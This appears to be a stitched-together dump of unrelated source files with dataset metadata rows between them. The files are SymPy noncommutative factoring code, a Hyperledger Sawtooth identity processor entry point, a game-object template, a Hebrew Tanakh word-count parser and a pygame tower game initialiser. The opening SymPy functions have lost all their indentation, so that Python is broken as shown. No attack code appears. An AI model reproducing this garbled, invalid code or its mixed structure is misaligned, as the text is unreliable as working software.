numers.append(term.coeff*numer.as_expr())
cont = cont.as_expr()
numer = Add(*numers)
denom = denom.as_expr()
if not isprimitive and numer.is_Add:
_cont, numer = numer.primitive()
cont *= _cont
return cont, numer, denom
def gcd_terms(terms, isprimitive=False, clear=True):
def mask(terms):
args = [(a, []) if a.is_commutative else a.args_cnc() for a in terms]
reps = []
for i, (c, nc) in enumerate(args):
if nc:
nc = Mul._from_args(nc)
d = Dummy()
reps.append((d, nc))
c.append(d)
args[i] = Mul._from_args(c)
else:
args[i] = c
return args, dict(reps)
terms = sympify(terms)
isexpr = isinstance(terms, Expr)
if not isexpr or terms.is_Add:
if isexpr:
terms = list(terms.args)
terms, reps = mask(terms)
cont, numer, denom = _gcd_terms(terms, isprimitive)
numer = numer.xreplace(reps)
coeff, factors = cont.as_coeff_Mul()
return _keep_coeff(coeff, factors*numer/denom, clear=clear)
if terms.is_Atom:
return terms
if terms.is_Mul:
c, args = terms.as_coeff_mul()
return _keep_coeff(c, Mul(*[gcd_terms(i, isprimitive, clear) for i in args]), clear=clear)
def handle(a):
if iterable(a):
if isinstance(a, Basic):
return a.func(*[gcd_terms(i, isprimitive, clear) for i in a.args])
return type(a)([gcd_terms(i, isprimitive, clear) for i in a])
return gcd_terms(a, isprimitive, clear)
return terms.func(*[handle(i) for i in terms.args])
def factor_terms(expr, radical=False, clear=False):
expr = sympify(expr)
is_iterable = iterable(expr)
if not isinstance(expr, Basic) or expr.is_Atom:
if is_iterable:
return type(expr)([factor_terms(i, radical=radical, clear=clear) for i in expr])
return expr
if expr.is_Pow or expr.is_Function or is_iterable or not hasattr(expr, 'args_cnc'):
args = expr.args
newargs = tuple([factor_terms(i, radical=radical, clear=clear) for i in args])
if newargs == args:
return expr
return expr.func(*newargs)
cont, p = expr.as_content_primitive(radical=radical)
list_args = [gcd_terms(a, isprimitive=True, clear=clear) for a in Add.make_args(p)]
p = Add._from_args(list_args)
p = gcd_terms(p, isprimitive=True, clear=clear)
return _keep_coeff(cont, p, clear=clear)
def _mask_nc(eq):
expr = eq
if expr.is_commutative:
return eq, {}, []
rep = []
nc_syms = [s for s in expr.free_symbols if not s.is_commutative]
if len(nc_syms) == 1:
nc = Dummy()
rep.append((nc_syms.pop(), nc))
expr = expr.subs(rep)
# we will replace it, but if it is a Symbol, Add, Mul, Pow we leave
# it alone.
nc_syms.sort(key=default_sort_key)
if nc_syms or not expr.is_commutative:
pot = preorder_traversal(expr)
for i, a in enumerate(pot):
if any(a == r[0] for r in rep):
pass
elif (
not a.is_commutative and
not (a.is_Symbol or a.is_Add or a.is_Mul or a.is_Pow)
):
rep.append((a, Dummy()))
else:
continue # don't skip
pot.skip()
expr = expr.subs(rep)
return expr, dict([(v, k) for k, v in rep]) or None, nc_syms
def factor_nc(expr):
from sympy.simplify.simplify import _mexpand
from sympy.polys import gcd, factor
expr = sympify(expr)
if not isinstance(expr, Expr) or not expr.args:
return expr
if not expr.is_Add:
return expr.func(*[factor_nc(a) for a in expr.args])
expr, rep, nc_symbols = _mask_nc(expr)
if rep:
return factor(expr).subs(rep)
else:
args = [a.args_cnc() for a in Add.make_args(expr)]
c = g = l = r = S.One
hit = False
# find any commutative gcd term
for i, a in enumerate(args):
if i == 0:
c = Mul._from_args(a[0])
elif a[0]:
c = gcd(c, Mul._from_args(a[0]))
else:
c = S.One
if c is not S.One:
hit = True
c, g = c.as_coeff_Mul()
for i, (cc, _) in enumerate(args):
cc = list(Mul.make_args(Mul._from_args(list(cc))/g))
args[i][0] = cc
# find any noncommutative common prefix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_prefix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][0].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][0].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
l = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][0] = il*args[i][1][0]
break
if not ok:
break
else:
hit = True
lenn = len(n)
l = Mul(*n)
for i, a in enumerate(args):
args[i][1] = args[i][1][lenn:]
# find any noncommutative common suffix
for i, a in enumerate(args):
if i == 0:
n = a[1][:]
else:
n = common_suffix(n, a[1])
if not n:
# is there a power that can be extracted?
if not args[0][1]:
break
b, e = args[0][1][-1].as_base_exp()
ok = False
if e.is_Integer:
for t in args:
if not t[1]:
break
bt, et = t[1][-1].as_base_exp()
if et.is_Integer and bt == b:
e = min(e, et)
else:
break
else:
ok = hit = True
r = b**e
il = b**-e
for i, a in enumerate(args):
args[i][1][-1] = args[i][1][-1]*il
break
if not ok:
break
else:
hit = True
lenn = len(n)
r = Mul(*n)
for i, a in enumerate(args):
args[i][1] = a[1][:len(a[1]) - lenn]
if hit:
mid = Add(*[Mul(*cc)*Mul(*nc) for cc, nc in args])
else:
mid = expr
# sort the symbols so the Dummys would appear in the same
# order as the original symbols, otherwise you may introduce
        # a factor of -1, e.g. A**2 - B**2 -- {A:y, B:x} --> y**2 - x**2
# and the former factors into two terms, (A - B)*(A + B) while the
# latter factors into 3 terms, (-1)*(x - y)*(x + y)
rep1 = [(n, Dummy()) for n in sorted(nc_symbols, key=default_sort_key)]
unrep1 = [(v, k) for k, v in rep1]
unrep1.reverse()
new_mid, r2, _ = _mask_nc(mid.subs(rep1))
new_mid = factor(new_mid)
new_mid = new_mid.subs(r2).subs(unrep1)
if new_mid.is_Pow:
return _keep_coeff(c, g*l*new_mid*r)
if new_mid.is_Mul:
# XXX TODO there should be a way to inspect what order the terms
# must be in and just select the plausible ordering without
# checking permutations
cfac = []
ncfac = []
for f in new_mid.args:
if f.is_commutative:
cfac.append(f)
else:
b, e = f.as_base_exp()
assert e.is_Integer
ncfac.extend([b]*e)
pre_mid = g*Mul(*cfac)*l
target = _mexpand(expr/c)
for s in variations(ncfac, len(ncfac)):
ok = pre_mid*Mul(*s)*r
if _mexpand(ok) == target:
return _keep_coeff(c, ok)
# mid was an Add that didn't factor successfully
return _keep_coeff(c, g*l*mid*r)
| true
| true
|
f70b5f4294a4d2ab507a4a6f16e55b064f90a04c
| 4,342
|
py
|
Python
|
sawtooth_identity/processor/main.py
|
STYJ/Sawtooth-Sample-Identity-TP
|
e1e914215f69a516bf81b98ed5a470134f6bd2aa
|
[
"Apache-2.0"
] | 1
|
2018-08-14T06:58:46.000Z
|
2018-08-14T06:58:46.000Z
|
sawtooth_identity/processor/main.py
|
STYJ/sawtooth-identity-tp
|
e1e914215f69a516bf81b98ed5a470134f6bd2aa
|
[
"Apache-2.0"
] | null | null | null |
sawtooth_identity/processor/main.py
|
STYJ/sawtooth-identity-tp
|
e1e914215f69a516bf81b98ed5a470134f6bd2aa
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import sys
import os
import argparse
import pkg_resources
# Adding the necessary path to PYTHONPATH
path = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(path)
from sawtooth_sdk.processor.core import TransactionProcessor
from sawtooth_sdk.processor.log import init_console_logging
from sawtooth_sdk.processor.log import log_configuration
from sawtooth_sdk.processor.config import get_log_config
from sawtooth_sdk.processor.config import get_log_dir
from sawtooth_sdk.processor.config import get_config_dir
from sawtooth_identity.processor.handler import IdentityTransactionHandler
from sawtooth_identity.processor.config.identity import IdentityConfig
from sawtooth_identity.processor.config.identity import \
load_default_identity_config
from sawtooth_identity.processor.config.identity import \
load_toml_identity_config
from sawtooth_identity.processor.config.identity import \
merge_identity_config
DISTRIBUTION_NAME = 'sawtooth-identity'
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-C', '--connect',
help='Endpoint for the validator connection')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='Increase output sent to stderr')
try:
version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version
except pkg_resources.DistributionNotFound:
version = 'UNKNOWN'
parser.add_argument(
'-V', '--version',
action='version',
version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')
.format(version),
help='print version information')
return parser.parse_args(args)
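# Illustrative invocation (hypothetical endpoint value): parse_args(['-C',
# 'tcp://localhost:4004', '-vv']) yields opts.connect == 'tcp://localhost:4004'
# and opts.verbose == 2, since -v uses action='count'.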
def load_identity_config(first_config):
default_identity_config = \
load_default_identity_config()
conf_file = os.path.join(get_config_dir(), 'identity.toml')
toml_config = load_toml_identity_config(conf_file)
return merge_identity_config(
configs=[first_config, toml_config, default_identity_config])
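# A sketch of the resulting precedence (an assumption read off the order of the
# ``configs`` list above): command-line values in first_config override
# identity.toml, which in turn overrides the built-in defaults.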
def create_identity_config(args):
return IdentityConfig(connect=args.connect)
def main(args=None):
if args is None:
args = sys.argv[1:]
opts = parse_args(args)
processor = None
try:
print("here 1")
arg_config = create_identity_config(opts)
identity_config = load_identity_config(arg_config)
processor = TransactionProcessor(url=identity_config.connect)
log_config = get_log_config(filename="identity_log_config.toml")
print("here 2")
# If no toml, try loading yaml
if log_config is None:
log_config = get_log_config(filename="identity_log_config.yaml")
if log_config is not None:
log_configuration(log_config=log_config)
else:
log_dir = get_log_dir()
# use the transaction processor zmq identity for filename
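            # (str(processor.zmq_id) yields a bytes repr such as "b'...'";
            # the [2:-1] slice below strips the b'' wrapper)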
log_configuration(
log_dir=log_dir,
name="identity-" + str(processor.zmq_id)[2:-1])
print('here 3')
init_console_logging(verbose_level=opts.verbose)
print('here 4')
handler = IdentityTransactionHandler()
print('here 5')
processor.add_handler(handler)
print('here 6')
processor.start()
print('here 7')
except KeyboardInterrupt:
pass
except Exception as e: # pylint: disable=broad-except
print("Error: {}".format(e))
finally:
if processor is not None:
processor.stop()
if __name__ == "__main__":
main()
| 33.145038
| 80
| 0.688392
|
import sys
import os
import argparse
import pkg_resources
path = os.path.dirname(os.path.dirname(os.getcwd()))
sys.path.append(path)
from sawtooth_sdk.processor.core import TransactionProcessor
from sawtooth_sdk.processor.log import init_console_logging
from sawtooth_sdk.processor.log import log_configuration
from sawtooth_sdk.processor.config import get_log_config
from sawtooth_sdk.processor.config import get_log_dir
from sawtooth_sdk.processor.config import get_config_dir
from sawtooth_identity.processor.handler import IdentityTransactionHandler
from sawtooth_identity.processor.config.identity import IdentityConfig
from sawtooth_identity.processor.config.identity import \
load_default_identity_config
from sawtooth_identity.processor.config.identity import \
load_toml_identity_config
from sawtooth_identity.processor.config.identity import \
merge_identity_config
DISTRIBUTION_NAME = 'sawtooth-identity'
def parse_args(args):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument(
'-C', '--connect',
help='Endpoint for the validator connection')
parser.add_argument('-v', '--verbose',
action='count',
default=0,
help='Increase output sent to stderr')
try:
version = pkg_resources.get_distribution(DISTRIBUTION_NAME).version
except pkg_resources.DistributionNotFound:
version = 'UNKNOWN'
parser.add_argument(
'-V', '--version',
action='version',
version=(DISTRIBUTION_NAME + ' (Hyperledger Sawtooth) version {}')
.format(version),
help='print version information')
return parser.parse_args(args)
def load_identity_config(first_config):
default_identity_config = \
load_default_identity_config()
conf_file = os.path.join(get_config_dir(), 'identity.toml')
toml_config = load_toml_identity_config(conf_file)
return merge_identity_config(
configs=[first_config, toml_config, default_identity_config])
def create_identity_config(args):
return IdentityConfig(connect=args.connect)
def main(args=None):
if args is None:
args = sys.argv[1:]
opts = parse_args(args)
processor = None
try:
print("here 1")
arg_config = create_identity_config(opts)
identity_config = load_identity_config(arg_config)
processor = TransactionProcessor(url=identity_config.connect)
log_config = get_log_config(filename="identity_log_config.toml")
print("here 2")
if log_config is None:
log_config = get_log_config(filename="identity_log_config.yaml")
if log_config is not None:
log_configuration(log_config=log_config)
else:
log_dir = get_log_dir()
log_configuration(
log_dir=log_dir,
name="identity-" + str(processor.zmq_id)[2:-1])
print('here 3')
init_console_logging(verbose_level=opts.verbose)
print('here 4')
handler = IdentityTransactionHandler()
print('here 5')
processor.add_handler(handler)
print('here 6')
processor.start()
print('here 7')
except KeyboardInterrupt:
pass
except Exception as e:
print("Error: {}".format(e))
finally:
if processor is not None:
processor.stop()
if __name__ == "__main__":
main()
| true
| true
|
f70b5fcacbe25a93df7d8bed3dc476118eb19b62
| 464
|
py
|
Python
|
data/scripts/templates/object/draft_schematic/space/shields/shared_adv_deflector_shields.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20
|
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/draft_schematic/space/shields/shared_adv_deflector_shields.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/draft_schematic/space/shields/shared_adv_deflector_shields.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20
|
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Intangible()
result.template = "object/draft_schematic/space/shields/shared_adv_deflector_shields.iff"
result.attribute_template_id = -1
result.stfName("string_id_table","")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 27.294118
| 90
| 0.734914
| true
| true
|
|
f70b5fe0481a8c9a2817f06ed651a862a7858a27
| 6,023
|
py
|
Python
|
src/hebphonics/parsers/mechon_mamre_org.py
|
ohizkiya/hebphonics
|
60f46f2fbec6704c4598dfccaa4326b1e17b133a
|
[
"MIT"
] | null | null | null |
src/hebphonics/parsers/mechon_mamre_org.py
|
ohizkiya/hebphonics
|
60f46f2fbec6704c4598dfccaa4326b1e17b133a
|
[
"MIT"
] | 11
|
2020-11-20T20:23:00.000Z
|
2021-01-28T14:23:19.000Z
|
src/hebphonics/parsers/mechon_mamre_org.py
|
ohizkiya/hebphonics
|
60f46f2fbec6704c4598dfccaa4326b1e17b133a
|
[
"MIT"
] | 1
|
2021-01-01T20:06:01.000Z
|
2021-01-01T20:06:01.000Z
|
#!/usr/bin/env python
# coding: utf-8
"""Download and parse Tanakh from <http://mechon-mamre.org/>.
The text is based on the [Aleppo Codex][1].
[1]: https://en.wikipedia.org/wiki/Aleppo_Codex
Each book is in a separate HTML file (e.g., `c01.htm`) and contains navigation
and textual data.
The relevant structure is:
```html
<BODY>
<H1>...</H1>
<P>
<B>...,...</B> ...
</P>
</BODY>
```
Notes:
- verses are newline-delimited
- `<H1>` Hebrew book name
- `<B>` comma-separated Hebrew numbering of chapter and verse
- for multipart volumes (e.g., Samuel, Kings) also contains the part number
- `<BIG>`, `<SMALL>`, `<SUP>` around a specific letter (we keep)
- `<A...>...</A>` links to notes (we ignore)
- `<BR>` within the text indicates a line break (we replace with a space)
- `{...}<BR>` indicates `pe` break (we ignore)
- `{...}` indicates `samekh` break (we ignore)
- `(...)` indicates the qere (we keep)
- the unvowelized previous word is the ketiv (we ignore)
"""
# native
from functools import partial
from multiprocessing import Queue
from pathlib import Path
from typing import List
import os
import re
# lib
from tqdm import tqdm
# pkg
from . import parse_args, download_unzip, Msg, queuer, spawn_processes, save_database
from .. import tokens as T, grammar
BOOK_NAMES = {
"בראשית": "Genesis",
"שמות": "Exodus",
"ויקרא": "Leviticus",
"במדבר": "Numbers",
"דברים": "Deuteronomy",
#
"יהושוע": "Joshua",
"שופטים": "Judges",
"שמואל א": "I Samuel",
"שמואל ב": "II Samuel",
"מלכים א": "I Kings",
"מלכים ב": "II Kings",
"ישעיהו": "Isaiah",
"ירמיהו": "Jeremiah",
"יחזקאל": "Ezekiel",
"הושע": "Hosea",
"יואל": "Joel",
"עמוס": "Amos",
"עובדיה": "Obadiah",
"יונה": "Jonah",
"מיכה": "Micah",
"נחום": "Nahum",
"חבקוק": "Habakkuk",
"צפניה": "Zephaniah",
"חגיי": "Haggai",
"זכריה": "Zechariah",
"מלאכי": "Malachi",
#
"תהילים": "Psalms",
"משלי": "Proverbs",
"איוב": "Job",
"שיר השירים": "Song of Songs",
"רות": "Ruth",
"איכה": "Lamentations",
"קוהלת": "Ecclesiastes",
"אסתר": "Esther",
"דנייאל": "Daniel",
"עזרא / נחמיה ע": "Ezra",
"עזרא / נחמיה נ": "Nehemiah",
"דברי הימים א": "I Chronicles",
"דברי הימים ב": "II Chronicles",
}
def count_words(lock, pos: int, read_q: Queue, write_q: Queue):
"""Count words in a book."""
# pylint: disable=too-many-locals
tqdm.set_lock(lock)
re_remove = re.compile(
r"</?P>|</?BIG>|</?SMALL>|</?SUP>|<A[^>]+>(.*)</A>|\{.\}|\(|\)"
)
re_name = re.compile(r"<H1>(.*)</H1>")
re_ref = re.compile(r"<B>(.*)</B>")
for msg in queuer(read_q):
result = {"books": [], "words": {}}
book = Path(msg.data)
text = book.read_text()
# book_num = int(book.stem[1:], 10)
book_name = re_name.search(text)[1]
book_num = 0
en_name = ""
# result["books"].append(
# dict(id=book_num, name=book_name, corpus="mechon-mamre.org")
# )
save_ref = ""
desc = f"{os.getpid()} COUNT {book_name:<15}"
for line in tqdm(text.split("\n"), desc=desc, position=pos):
line = re_remove.sub("", line).replace("<BR>", " ").strip()
if save_ref:
ref, save_ref = save_ref, ""
else:
if not line or not line.startswith("<B>"):
continue
ref = re_ref.search(line)[1].replace(" ׆", "")
if "-" in ref:
ref, save_ref = ref.split("-")
save_ref = f'{ref.split(",")[0]},{save_ref}'
ref = f"{book_name} {ref}"
he_name, ref = ref.rsplit(" ", 1)
tmp_name = BOOK_NAMES[he_name]
if tmp_name != en_name:
en_name = tmp_name
book_num = list(BOOK_NAMES).index(he_name) + 1
result["books"].append(
dict(id=book_num, name=en_name, corpus="mechon-mamre.org")
)
chapter, verse = ref.split(",")
chapter, verse = grammar.gematria(chapter), grammar.gematria(verse)
line = re_ref.sub("", line) # reference removed
line = line.replace(T.PUNCTUATION_MAQAF, T.PUNCTUATION_MAQAF + " ")
for raw in line.split():
clean = T.strip(raw)
if not clean:
continue
if clean in result["words"]:
result["words"][clean]["freq"] += 1
else:
ref = f"{en_name} {chapter}:{verse}"
result["words"][clean] = dict(
book_id=book_num, freq=1, ref=ref, raw=raw
)
write_q.put(Msg("SAVE", result))
def list_books(read_q: Queue, folder: Path):
"""Enqueue paths of books to parse."""
for path in sorted(folder.iterdir()):
read_q.put(Msg("COUNT", path))
def main(argv: List[str] = None):
"""Parse texts from <http://mechon-mamre.org>.
Usage: mechon_mamre_org.py [download <folder> | -i <PATH>] [-n COUNT]
Options:
download <folder> download HTML files to <folder>
--index, -i PATH HTML folder [default: text/mechon-mamre.org]
--cpus, -n NUM number of CPUs to use; at least 2 [default: all]
"""
args = parse_args(main.__doc__ or "", argv)
num_readers = args["num_readers"]
num_writers = args["num_writers"]
if args["download"]:
url = "http://mechon-mamre.org/htmlzips/ct005.zip"
folder = Path(args["<folder>"]).resolve()
pattern = re.compile(r"c/ct/c[0-9]{2}.htm")
folder = download_unzip(url, folder, pattern)
else:
folder = Path(args["--index"]).resolve()
init_fn = partial(list_books, folder=folder)
spawn_processes(init_fn, count_words, save_database, num_readers, num_writers)
if __name__ == "__main__": # pragma: no cover
main()
| 30.573604
| 85
| 0.546738
|
from functools import partial
from multiprocessing import Queue
from pathlib import Path
from typing import List
import os
import re
from tqdm import tqdm
from . import parse_args, download_unzip, Msg, queuer, spawn_processes, save_database
from .. import tokens as T, grammar
BOOK_NAMES = {
"בראשית": "Genesis",
"שמות": "Exodus",
"ויקרא": "Leviticus",
"במדבר": "Numbers",
"דברים": "Deuteronomy",
"יהושוע": "Joshua",
"שופטים": "Judges",
"שמואל א": "I Samuel",
"שמואל ב": "II Samuel",
"מלכים א": "I Kings",
"מלכים ב": "II Kings",
"ישעיהו": "Isaiah",
"ירמיהו": "Jeremiah",
"יחזקאל": "Ezekiel",
"הושע": "Hosea",
"יואל": "Joel",
"עמוס": "Amos",
"עובדיה": "Obadiah",
"יונה": "Jonah",
"מיכה": "Micah",
"נחום": "Nahum",
"חבקוק": "Habakkuk",
"צפניה": "Zephaniah",
"חגיי": "Haggai",
"זכריה": "Zechariah",
"מלאכי": "Malachi",
"תהילים": "Psalms",
"משלי": "Proverbs",
"איוב": "Job",
"שיר השירים": "Song of Songs",
"רות": "Ruth",
"איכה": "Lamentations",
"קוהלת": "Ecclesiastes",
"אסתר": "Esther",
"דנייאל": "Daniel",
"עזרא / נחמיה ע": "Ezra",
"עזרא / נחמיה נ": "Nehemiah",
"דברי הימים א": "I Chronicles",
"דברי הימים ב": "II Chronicles",
}
def count_words(lock, pos: int, read_q: Queue, write_q: Queue):
tqdm.set_lock(lock)
re_remove = re.compile(
r"</?P>|</?BIG>|</?SMALL>|</?SUP>|<A[^>]+>(.*)</A>|\{.\}|\(|\)"
)
re_name = re.compile(r"<H1>(.*)</H1>")
re_ref = re.compile(r"<B>(.*)</B>")
for msg in queuer(read_q):
result = {"books": [], "words": {}}
book = Path(msg.data)
text = book.read_text()
book_name = re_name.search(text)[1]
book_num = 0
en_name = ""
save_ref = ""
desc = f"{os.getpid()} COUNT {book_name:<15}"
for line in tqdm(text.split("\n"), desc=desc, position=pos):
line = re_remove.sub("", line).replace("<BR>", " ").strip()
if save_ref:
ref, save_ref = save_ref, ""
else:
if not line or not line.startswith("<B>"):
continue
ref = re_ref.search(line)[1].replace(" ׆", "")
if "-" in ref:
ref, save_ref = ref.split("-")
save_ref = f'{ref.split(",")[0]},{save_ref}'
ref = f"{book_name} {ref}"
he_name, ref = ref.rsplit(" ", 1)
tmp_name = BOOK_NAMES[he_name]
if tmp_name != en_name:
en_name = tmp_name
book_num = list(BOOK_NAMES).index(he_name) + 1
result["books"].append(
dict(id=book_num, name=en_name, corpus="mechon-mamre.org")
)
chapter, verse = ref.split(",")
chapter, verse = grammar.gematria(chapter), grammar.gematria(verse)
line = re_ref.sub("", line)
line = line.replace(T.PUNCTUATION_MAQAF, T.PUNCTUATION_MAQAF + " ")
for raw in line.split():
clean = T.strip(raw)
if not clean:
continue
if clean in result["words"]:
result["words"][clean]["freq"] += 1
else:
ref = f"{en_name} {chapter}:{verse}"
result["words"][clean] = dict(
book_id=book_num, freq=1, ref=ref, raw=raw
)
write_q.put(Msg("SAVE", result))
def list_books(read_q: Queue, folder: Path):
for path in sorted(folder.iterdir()):
read_q.put(Msg("COUNT", path))
def main(argv: List[str] = None):
args = parse_args(main.__doc__ or "", argv)
num_readers = args["num_readers"]
num_writers = args["num_writers"]
if args["download"]:
url = "http://mechon-mamre.org/htmlzips/ct005.zip"
folder = Path(args["<folder>"]).resolve()
pattern = re.compile(r"c/ct/c[0-9]{2}.htm")
folder = download_unzip(url, folder, pattern)
else:
folder = Path(args["--index"]).resolve()
init_fn = partial(list_books, folder=folder)
spawn_processes(init_fn, count_words, save_database, num_readers, num_writers)
if __name__ == "__main__":
main()
| true
| true
|
f70b602fa67e6e8b514ce3156eac1f98c7a45b36
| 303
|
py
|
Python
|
src/main/resources/docs/tests/R0914.py
|
h314to/codacy-pylint
|
9d31567db6188e1b31ce0e1567998f64946502df
|
[
"Apache-2.0"
] | null | null | null |
src/main/resources/docs/tests/R0914.py
|
h314to/codacy-pylint
|
9d31567db6188e1b31ce0e1567998f64946502df
|
[
"Apache-2.0"
] | null | null | null |
src/main/resources/docs/tests/R0914.py
|
h314to/codacy-pylint
|
9d31567db6188e1b31ce0e1567998f64946502df
|
[
"Apache-2.0"
] | null | null | null |
##Patterns: R0914: { "max-locals": "3" }
##Warn: R0914
def doEverything(thing):
a = 3
b = 3
c = 3
d = 3
e = 3
f = 3
g = 3
h = 3
i = 3
j = 3
k = 3
l = 3
m = 3
n = 3
o = 3
p = 3
q = 3
r = 3
s = 3
t = 3
| 12.625
| 41
| 0.30363
|
c = 3
d = 3
e = 3
f = 3
g = 3
h = 3
i = 3
j = 3
k = 3
l = 3
m = 3
n = 3
o = 3
p = 3
q = 3
r = 3
s = 3
t = 3
| true
| true
|
f70b604cbbd058238c84f4a1dabfc8279733f7ac
| 9,038
|
py
|
Python
|
test.py
|
oscarcx123/MagicTower-Python
|
14ccf8e811e90adc3c4bc7b225e23dbb79c2d28e
|
[
"BSD-3-Clause"
] | 36
|
2019-07-26T09:19:28.000Z
|
2022-02-20T07:14:50.000Z
|
test.py
|
oscarcx123/MagicTower-Python
|
14ccf8e811e90adc3c4bc7b225e23dbb79c2d28e
|
[
"BSD-3-Clause"
] | 1
|
2019-02-03T01:51:46.000Z
|
2019-02-03T01:51:46.000Z
|
test.py
|
oscarcx123/MagicTower-Python
|
14ccf8e811e90adc3c4bc7b225e23dbb79c2d28e
|
[
"BSD-3-Clause"
] | 11
|
2019-02-02T13:49:26.000Z
|
2022-03-09T13:25:41.000Z
|
# Used as a test for the new framework
import pygame
import os
import json
import platform
import ctypes
from sysconf import *
pygame.init()
# On Windows, disable display scaling for the game.
# Note: high-DPI users on Windows usually set scaling above 100%, since
# everything is painfully small otherwise. For example, on a 1920*1080 screen
# Windows recommends 125% scaling. That scaling would blow the game window up
# so much that part of the picture ends up below the taskbar. Linux does not
# have this problem, so we only check for Windows here.
if platform.system() == "Windows":
ctypes.windll.user32.SetProcessDPIAware()
# Set the game window size
screen = pygame.display.set_mode([WIDTH, HEIGHT])
# Set the window title
pygame.display.set_caption(TOWER_NAME)
from lib.utools import *
from lib import CurrentMap, PlayerCon, WriteLog
from lib.ground import GroundSurface
from lib import global_var
from lib.event import EventFlow, Event
from project.block import BlockData
RootScreen = GroundSurface(mode="copy", surface=screen)
running = True
from lib import ui
from lib import actions
action_control = actions.ActionControl()
from lib import music
def init():
global_var.set_value("font_name", FONT_NAME)
global_var.set_value("RootScreen", RootScreen)
global_var.set_value("action_control", action_control)
    # Register PlayerCon as a global variable (must be done before CurrentMap.set_map)
global_var.set_value("PlayerCon", PlayerCon)
    # Initialize the map
CurrentMap.set_map(PLAYER_FLOOR)
CurrentMap.add_sprite(PlayerCon)
global_var.set_value("CurrentMap", CurrentMap)
WriteLog.debug(__name__, "初始化地图完成")
    # Initialize BlockData (build a dict to reverse-look-up map identifiers by id)
BlockDataReverse = {}
for map_obj in BlockData:
block_id = BlockData[map_obj]["id"]
BlockDataReverse[block_id] = map_obj
global_var.set_value("BlockDataReverse", BlockDataReverse)
    # Placeholder for the status bar (removing it would shift the in-game map position)
StatusBarArea = RootScreen.add_child("left", BLOCK_UNIT * 4)
StatusBarArea.priority = 15
RootScreen.add_child(CurrentMap)
    # Initialize the UI layers
    # --- UI0 - status bar
    STATUSBAR = ui.StatusBar(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
STATUSBAR.priority = 145
RootScreen.add_child(STATUSBAR)
global_var.set_value("STATUSBAR", STATUSBAR)
WriteLog.debug(__name__, "初始化状态栏图层完成")
    # --- UI1 - monster manual
    BOOK = ui.Book(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    BOOK.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(BOOK)
global_var.set_value("BOOK", BOOK)
WriteLog.debug(__name__, "初始化怪物手册图层完成")
    # --- UI2 - start menu
    STARTMENU = ui.StartMenu(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    STARTMENU.priority = 500  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(STARTMENU)
global_var.set_value("STARTMENU", STARTMENU)
WriteLog.debug(__name__, "初始化开始界面图层完成")
    # --- UI3 - backpack
    BACKPACK = ui.Backpack(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    BACKPACK.priority = 150  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(BACKPACK)
global_var.set_value("BACKPACK", BACKPACK)
WriteLog.debug(__name__, "初始化背包图层完成")
    # --- UI4 - save menu
    SAVE = ui.SaveMenu(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    SAVE.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(SAVE)
global_var.set_value("SAVE", SAVE)
WriteLog.debug(__name__, "初始化存档图层完成")
    # --- UI5 - load menu
    LOAD = ui.LoadMenu(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    LOAD.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(LOAD)
global_var.set_value("LOAD", LOAD)
WriteLog.debug(__name__, "初始化读档图层完成")
    # --- UI6 - floor teleporter
    FLY = ui.Fly(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    FLY.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(FLY)
global_var.set_value("FLY", FLY)
WriteLog.debug(__name__, "初始化楼层传送器图层完成")
    # --- UI7 - help screen
    HELP = ui.Help(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    HELP.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(HELP)
global_var.set_value("HELP", HELP)
WriteLog.debug(__name__, "初始化帮助图层完成")
    # --- UI8 - shop 1
    Shop1 = ui.Shop1(mode='copy', surface=RootScreen)  # must be initialized the same way as a ground surface
    Shop1.priority = 140  # render priority; higher than the map, so drawn on top of it
RootScreen.add_child(Shop1)
global_var.set_value("Shop1", Shop1)
